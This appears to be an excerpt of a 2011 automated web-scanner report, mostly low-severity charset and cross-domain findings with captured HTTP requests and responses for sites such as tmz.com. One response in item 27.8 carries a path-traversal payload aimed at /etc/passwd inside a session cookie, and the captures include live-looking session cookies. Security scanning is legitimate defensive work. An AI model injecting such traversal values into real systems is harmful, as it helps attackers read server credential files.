GET / HTTP/1.1
Host: www.radius.cistron.nl
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:41 GMT
Server: Apache/2.2.9
Vary: Host
Last-Modified: Wed, 08 Feb 2006 17:11:15 GMT
ETag: "1921-40c4b956bdb5e"
Accept-Ranges: bytes
Content-Length: 6433
Content-Type: text/html

<Html>

<Head>
<Title>http://www.radius.cistron.nl/ Cistron RADIUS server</Title>
</Head>

<Body BackGround="/pix/back.gif" BgColor="#EEEEEE" Text="#000000"
Link="#AA0000" Vlink="#770000">

<H2 Align
...[SNIP]...

26.78. http://www.radius.cistron.nl/faq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radius.cistron.nl
Path:   /faq/

Request

GET /faq/ HTTP/1.1
Host: www.radius.cistron.nl
Proxy-Connection: keep-alive
Referer: http://www.radius.cistron.nl/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:47:53 GMT
Server: Apache/2.2.9
Vary: Host
Last-Modified: Mon, 14 May 2001 12:51:15 GMT
ETag: "176-384422c3c76c0"
Accept-Ranges: bytes
Content-Length: 374
Content-Type: text/html

<Html>
<Head>
<Title> Cistron RADIUS FAQ </Title>
</Head>

<frameset ROWS="100%,*" border=0 frameborder="no" framespacing=0 framepadding=0>
<frame SRC="http://www.freeradius.org/faq/cistron.html" bord
...[SNIP]...

26.79. http://www.spotngo.ca/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spotngo.ca
Path:   /

Request

GET / HTTP/1.1
Host: www.spotngo.ca
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:54 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 06 May 2010 18:05:19 GMT
ETag: "119903e0-3bdc-485f0c913b5c0"
Accept-Ranges: bytes
Content-Length: 15324
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>Spotngo Hotspot Services and Hotspot Software Provider</TITLE>
<meta name="description" content="Hotspot & Wireless LAN internet provider, WISP/WiMAX/Hotspot/Wifi Software pr
...[SNIP]...

26.80. http://www.spotngo.ca/services.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spotngo.ca
Path:   /services.htm

Request

GET /services.htm HTTP/1.1
Host: www.spotngo.ca
Proxy-Connection: keep-alive
Referer: http://www.spotngo.ca/spotngonav.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=250201924.1704081487.1316220470.1316220470.1316220470.1; __utmb=250201924; __utmc=250201924; __utmz=250201924.1316220470.1.1.utmccn=(referral)|utmcsr=radius-server.net|utmcct=/aradial-radius-server-billing-partners-inner.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:47:23 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 06 Nov 2009 23:01:10 GMT
ETag: "1199008a-40e6-477bbd1d79980"
Accept-Ranges: bytes
Content-Length: 16614
Content-Type: text/html

<HTML>
<HEAD>
<META http-equiv="Content-Language" content="en-us">
<TITLE>Spotngo Hotspot Services</TITLE>
<meta name="description" content="Hotspot & Wireless LAN internet provider, WISP/WiMAX/Hots
...[SNIP]...

26.81. http://www.vm.ibm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vm.ibm.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.vm.ibm.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=jV0H8GMq55X-XKTuBBF; ibmSurvey=1316220233336; pSite=http%3A//www.vm.ibm.com/perf/reports/zvm/html/imap.html

Response

HTTP/1.0 404 Not Found
Server: z/Web-server_for_VM+SSL/1.6a
MIME-version: 1.0
Content-Type: text/html

<html>
<!-- z/Web-Server for VM 1.6a EWMSG-->
<HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY><H1>404 Not Found</H1> The requested URL PATH was not found on this server.<P> </BODY>
</html>

26.82. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websitealive2.com
Path:   /89/Visitor/vTracker_v2.asp

Request

GET /89/Visitor/vTracker_v2.asp?websiteid=0&groupid=89 HTTP/1.1
Host: www.websitealive2.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Length: 8620
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
Set-Cookie: wsa=cookiedetect=True&pagesvisited%5F0=2&lastwebsiteid=0&proactiveauto%5Fenabled%5F0=N; path=/89
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 00:25:56 GMT


//alert('False');


var embed_departmentid = '0';


// keep on page
function URLEncode(plaintext)
{
   // The Javascript escape and unescape functions do not correspond
   // with what brows
...[SNIP]...

27. HTML uses unrecognised charset  previous  next
There are 14 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


27.1. http://js-kit.com/api/session/refresh.js  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://js-kit.com
Path:   /api/session/refresh.js

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

POST /api/session/refresh.js HTTP/1.1
Host: js-kit.com
Proxy-Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: http://bostonherald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: jsKitUser=5U.XPFsqVN7k25fU7rZilWEPP4KFxW6gsljYL8RbdQTDApNrH0q0qQ--

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:00:41 GMT
Content-Type: text/html; charset="utf-8"
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Content-Length: 10
P3P: CP="NON DSP COR ADMa DEVa TAIa PSAa PSDa IVDi OTPi OUR PUBi IND PHY ONL UNI COM NAV DEM CNT PRE"
Expires: Fri, 16 Sep 2011 18:00:41 GMT
Pragma: no-cache

/* OK */


27.2. http://www.tmz.com/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tmz.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET / HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:51:55 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 132529
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/"
...[SNIP]...
<meta property="fb:page_id" content="208421665712" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.3. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tmz.com
Path:   /2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=467a26e36b344d031207fb454f356be4&rdid=231534154&type=YLD_def_ch&in-site=true&req_id=da23b34cfa8657c71e50520363d1bbbe&agent=blog_JS_rec&recMode=4&reqType=1&wid=100&imgType=0&refPub=347&prs=false&scp=false&version=42206&idx=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_campaign=hero3; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DMichaele%252520Salahi%252520--%252520%252526%252523039%25253BWild%252520Sex%252526%252523039%25253B%252520Claims%252520with%252520Journey%252520Guitarist%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:00:18 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:00:18 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562eff7c43ff78cfa8bd07; expires=Sun, 20-Feb-2028 01:00:18 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 112256
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<meta name="tweetmeme-title" content="&#039;NCIS&#039; Actor -- Dead Mother Insult Led to Violence" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.4. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tmz.com
Path:   /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero2; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DRon%252520Artest%252520--%252520Name%252520Change%252520Official%252520...%252520Say%252520Hello%252520to%252520World%252520Peace%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-ch%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:47 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:47 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562eff1d45dc9035b97879; expires=Sun, 20-Feb-2028 00:58:47 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115459
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<meta name="tweetmeme-title" content="Michaele Salahi -- &#039;Wild Sex&#039; Claims with Journey Guitarist" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.5. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tmz.com
Path:   /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero3; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253D%252526%252523039%25253BNCIS%252526%252523039%25253B%252520Actor%252520--%252520Dead%252520Mother%252520Insult%252520Led%252520to%252520Violence%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-i%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:00:46 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:00:46 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562effac2cf8f69d82c880; expires=Sun, 20-Feb-2028 01:00:46 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115860
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<meta name="tweetmeme-title" content="Justin Timberlake: Not My Penis!" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.6. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tmz.com
Path:   /2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_sq=wbrostmz%3D%2526pid%253DCelebrity%252520Gossip%252520%25257C%252520Entertainment%252520News%252520%25257C%252520Celebrity%252520News%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:56:17 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:56:18 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; expires=Sun, 20-Feb-2028 00:56:17 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 112027
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<meta name="tweetmeme-title" content="Nancy Grace -- RUMPSHAKIN&#039; in the TMZ Ballroom!!" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.7. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tmz.com
Path:   /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_sq=wbrostmz%3D%2526pid%253DNancy%252520Grace%252520--%252520RUMPSHAKIN%252526%252523039%25253B%252520in%252520the%252520TMZ%252520Ballroom%252521%252521%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petit_2%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:11 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:11 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; expires=Sun, 20-Feb-2028 00:58:11 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 111374
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<meta name="tweetmeme-title" content="Ron Artest -- Name Change Official ... Say Hello to World Peace" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.8. http://www.tmz.com/reset-password/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tmz.com
Path:   /reset-password/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /reset-password/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero1; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DSign%252520In%252520%25253A%252520TMZ%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/reset-password/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:03:54 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:03:55 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd; expires=Sun, 20-Feb-2028 01:03:54 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 57490
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text
...[SNIP]...
<meta property="fb:page_id" content="208421665712" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.9. http://www.tmz.com/signin/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tmz.com
Path:   /signin/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /signin/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
